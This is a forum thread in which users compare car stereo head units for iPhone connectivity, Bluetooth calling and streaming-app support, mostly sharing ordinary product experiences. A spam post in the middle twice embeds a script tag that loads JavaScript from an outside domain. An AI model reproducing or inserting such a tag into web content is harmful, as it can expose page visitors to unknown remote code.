Page 1 of 2 12 LastLast

Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: Car stereo head units

Default Car stereo head units
    I've been looking around trying to research the best head unit to get to connect my iPhone. Things have changed a lot in the past few years with different stereos and firmware versions having different results so it has been difficult to search and find some solid info on if I can find the solution I am looking for.

Ideally I would want to be able to control the music on the head unit however I definitely want to be able to listen to music through streaming apps such as Pandora or Slacker which I'm not sure if any head unit control will work with.

Hands free phone integration would be nice, but not totally necessary. I'm never going to play CD's in it so it doesn't need a CD player either.

The two head units I've been mainly looking at are the Alpine IDA-X303/X305 and the Parrot RKI-8400.

My main questions would be are there any other head units that I should maybe be looking at? And for any of these stereos that connect to the iphone's dock connector, are the phone controls locked out while plugged in? Also I hear mixed results about connecting head units to an iphone that is jailbroken, that some have posted their experience with it not working, however I do not know how long ago and what firmware version that may have been. Any help is appreciated.

What's Jailbreak?
    Thanks

I've got an Alpine head unit in my Tundra. Exceptional sound, and the iPod/iPhone interface cable was $30. Playlists and everything are accessible from the head unit controls.

You should know that when I plug my iPhone into the head unit, I'm asked if I want to put the phone in aircraft mode to avoid interference. Not a big deal to me since I have a 3rd Gen Nano that is always plugged into the head unit - I just update the music every couple weeks or so.

Thanks

Alpine CDA-105 Works great with my iPhone 3G and 3Gs.

I have the idax305 and its a great deck. no deck i have ever seen works the iphone/ipod faster. comes with the cable and also has the ability to control all usb devices.

Only problem is that when using the iphone, sometimes it doesnt find the iphone on the first try. you may have to reconnect it. this doesnt happen with the ipods. this is a minor problem considering how well the deck works with the phone. all your music with coverart at your fingertips.

as long as you can live with no cd slot, this is probably your best bet.

Avic F700, nav and ipod interface, works with pandora too, great unit and cheap.

Check out the Sony Xplod MEX-BT3700U it has bluetooth synch with the iPhone and you can make calls and listen to music, I'm gonna buy one soon, tried it in the shop and it worked really well
    Eric's iPhone 4 4.01 offically unlocked

Quote Originally Posted by ericidle View Post
    Check out the Sony Xplod MEX-BT3700U it has bluetooth sync...
    Anyone know a cheaper Sony model that works well but doesn't have the bluetooth? I'm looking for something a bit cheaper, but can still control the 3GS with

Thanks for the suggestions. Do you know for those that connect via USB, do they lock out your iPhone controls? And are they able to play music from other apps on the phone aside from the iPod app?

The avic F700 looks amazing but unfortunately my car is not double-din friendly, bastards had to put the climate controls between the stereo and the "pocket", like WTF.

Thanks
    Thanked 1,175 Times in 724 Posts

There is too many variable if you care what will work best. Alpine sounds great, but lacks features. Eclipse also sounds great, but has even less features (almost none). Pioneer gives you tons of features, but less overall sounds quality, Sony gives you the most features of all and the bottom of the bucket in sound.

Too many variables. MOST do not do anything except forward and backward + shuffle. The last two have more advanced features. You can forget about being picky on advanced options. Most car manufacturers just want them to make noise and you're getting all you will get from them.They do not interface with the apple OS.

Quote Originally Posted by SurferX View Post
    I've been looking around trying to research the best head unit to get to connect my iPhone. Things have changed a lot in the past few years with different stereos and firmware versions having different results so it has been difficult to search and find some solid info on if I can find the solution I am looking for.

Ideally I would want to be able to control the music on the head unit however I definitely want to be able to listen to music through streaming apps such as Pandora or Slacker which I'm not sure if any head unit control will work with.

Hands free phone integration would be nice, but not totally necessary. I'm never going to play CD's in it so it doesn't need a CD player either.

The two head units I've been mainly looking at are the Alpine IDA-X303/X305 and the Parrot RKI-8400.

My main questions would be are there any other head units that I should maybe be looking at? And for any of these stereos that connect to the iphone's dock connector, are the phone controls locked out while plugged in? Also I hear mixed results about connecting head units to an iphone that is jailbroken, that some have posted their experience with it not working, however I do not know how long ago and what firmware version that may have been. Any help is appreciated.
    I have experience only with Alpine IDA-X303. Don't know about any other head units...

Thanks

With my Alpine, i can scroll playlists, artist, track just like on the iphone itself. It charges my iPhone as well. Not sure what other advanced features One1 is referring to since with my ipod I usually KISS.

i have the Alpine CDA-9887 with the KCE-300BT bluetooth adapter. The alpine head unit i have is TOP OF THE LINE for sound quality and adjustment. It has a full Parametric EQ so you can fully tune your sound to your liking. I have an ipod USB cable that connects to my iPod and i get excellent sound quality. The bluetooth connects to my iPhone and transfers contact info and everything. The only thing it doesnt transfer is my favorites. but you get your contacts, missed calls, dialed calls, and received calls. It also does bluetooth streaming. The only problem is you can not control the bluetooth streaming through the head unit. It doesnt bother me though. I can throw on pandora, or any other app i want and it plays directly through my speakers. its great!

BTW the KCE-300BT is outdated and there is a new device thats out. Idk if any features are improved but i would think they would have to be.

That's some great info, thanks. I think I will go with one of the Alpine decks since it seems like they will be able to do what I want them to do and I know from experience the quality is always excellent from them.

Nice share.

<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>

Nice share.

<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    Last edited by mrsohel_tex; 2009-10-15 at 07:05 AM. Reason: Automerged Doublepost

Green Apple
    Thanks

If you're on more of a budget, I recommend an older Alpine that is capable using the ipod adaptor. I have a CDA 9856, which you can find online for relatively cheap. The sound quality is phenomenal and the adaptor will only run you about 30 bucks as well, so for a small investment you'll get a great setup.

iPhoneaholic
    Thanks

As far as I know I think car stereos is available with iphone from the beginning. Check out iphone accessories. I think you will get it.
    mod/edit links removed

I was hoping this thread wasnt dead yet since I am now in the market for a car stereo that works great with the 3g and 3gs .
    Been on ebay and pricewatch trying to get an idea and read reviews . Cant find a head to head comparison chart anywhere to check the features of each . Looked at about a hundred different head units and want to be sure I get something I will be satisfied with . Most say the work with the ipod but no mention of iphone .
    So here are the features I am interested in and maybe someone can clear things up .

Integrated Bluetooth. No add on BS and must be able use phone with it.

USB (front)- not mini usb . also must be able to charge iphone and play mp3's on thumb drives.

Aux Jack (front)

Control ipod/iphone from head unit or remote.

either 2 or 4 inch head unit din size .

Easy controls on head unit .

Overall sound quality not as important since I have the stock speakers .

Hope thats not too much to ask .
    Thanks to all that can help on this .

Clarion used to make really high end head units that where ipod compatible with important things like 4volt rca's and quality pieces inside for better overall adjustments to tailor the sound for the driver. They still make great units but many of the "ooomph" factors have been taken away.

Alpine is a no brainer, and Eclipse does have very little features but I have an 8 volt h/u from them and the parametric equalization on the head unit alone along with the 8 volts going to my amps in the back make that ipod connection sound wonderful, so honestly I can't knock the clipse....

iPhoneaholic
    Thanks

My car stereos are not working out. Is there any way to repair it? Should I take them to apple service center? Let me know about a good solution.
    mod/edit links removed

Quote Originally Posted by gray bishop View Post
    Clarion used to make really high end head units that where ipod compatible with important things like 4volt rca's and quality pieces inside for better overall adjustments to tailor the sound for the driver. They still make great units but many of the "ooomph" factors have been taken away.

Alpine is a no brainer, and Eclipse does have very little features but I have an 8 volt h/u from them and the parametric equalization on the head unit alone along with the 8 volts going to my amps in the back make that ipod connection sound wonderful, so honestly I can't knock the clipse....
    yea get something with high voltage output so u dont have to turn the gain up on the amps and distort.

but some more important questions?
    budget?
    what do u expect out of it?
    are u going to add amps?
    if so 5ch or a 4ch and a mono block?
    plan on using a signal proccesor or digital equalizer?

Page 1 of 2 12 LastLast